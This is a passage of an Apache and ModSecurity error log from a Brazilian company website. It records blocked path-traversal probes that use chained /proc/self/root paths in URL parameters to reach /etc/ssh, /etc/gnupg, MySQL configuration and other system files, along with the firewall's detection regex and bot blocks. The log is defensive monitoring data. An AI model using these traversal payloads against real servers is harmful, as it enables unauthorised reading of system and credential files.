"/"] [unique_id "ab1AILninkcc-iUj5ApyEQAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:40:09.773013 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.244.43:54422] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1AKfXLqtnMIWvjpaKuhQAAAoA"]
[Fri Mar 20 09:40:23.384307 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:43164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ANxCii7xarUs8iHZ8hAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:40:28.307232 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:38094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1APNa6ubjKNq_cu4buPAAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:41:03.985635 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:53750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1AX11pVZ5mVmJwsFNFhQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:41:08.838942 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:43192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1AZF1pVZ5mVmJwsFNFjQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:41:35.312345 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:60178] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:42:03.739086 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:48792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Am_XLqtnMIWvjpaKu_AAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:42:16.821876 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:55844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1AqPHIg5MgXLBnicMMWgAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:42:56.961901 2026] [mime_magic:error] [pid 10189:tid 140411624429312] (70014)End of file found: [client 57.141.18.24:35984] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:42:56.969885 2026] [mime_magic:error] [pid 10189:tid 140411699963648] (70014)End of file found: [client 74.7.243.128:57910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var
[Fri Mar 20 09:42:56.969892 2026] [mime_magic:error] [pid 10189:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:35994] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:43:11.121907 2026] [mime_magic:error] [pid 10189:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:36950] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:43:51.741861 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.228.61:36174] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1BB11pVZ5mVmJwsFNGUwAAAFA"]
[Fri Mar 20 09:45:10.795098 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.244.43:59194] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1BVgF0L0L-SsrnPo5-VwAAAsY"]
[Fri Mar 20 09:45:25.025933 2026] [mime_magic:error] [pid 11167:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:43146] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:45:32.881794 2026] [mime_magic:error] [pid 7235:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:46148] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt
[Fri Mar 20 09:45:43.303789 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:36438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Bd-oXxyEfFpUF8f-WWAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 09:47:37.913173 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:36438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B6eoXxyEfFpUF8f-W5gAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:39.329911 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:37564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B6_HIg5MgXLBnicMNvQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:43.170222 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:44090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B7PqxLDW4GITHUkT_TAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:46.575184 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:44094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B8vqxLDW4GITHUkT_VgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:47.979439 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:44108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B8_XLqtnMIWvjpaKwhQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:49.988081 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:44112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B9fqxLDW4GITHUkT_XgAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:51.587039 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:45812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B9_qxLDW4GITHUkT_ZgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:52.979636 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.243.128:45828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B-F1pVZ5mVmJwsFNHDwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:54.650566 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:45830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B-gF0L0L-SsrnPo5-9gAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:56.611362 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:45840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B_BCii7xarUs8iHZ-GQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:58.071080 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:45850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B_hCii7xarUs8iHZ-JAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:47:59.427131 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:38730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1B_11pVZ5mVmJwsFNHGAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
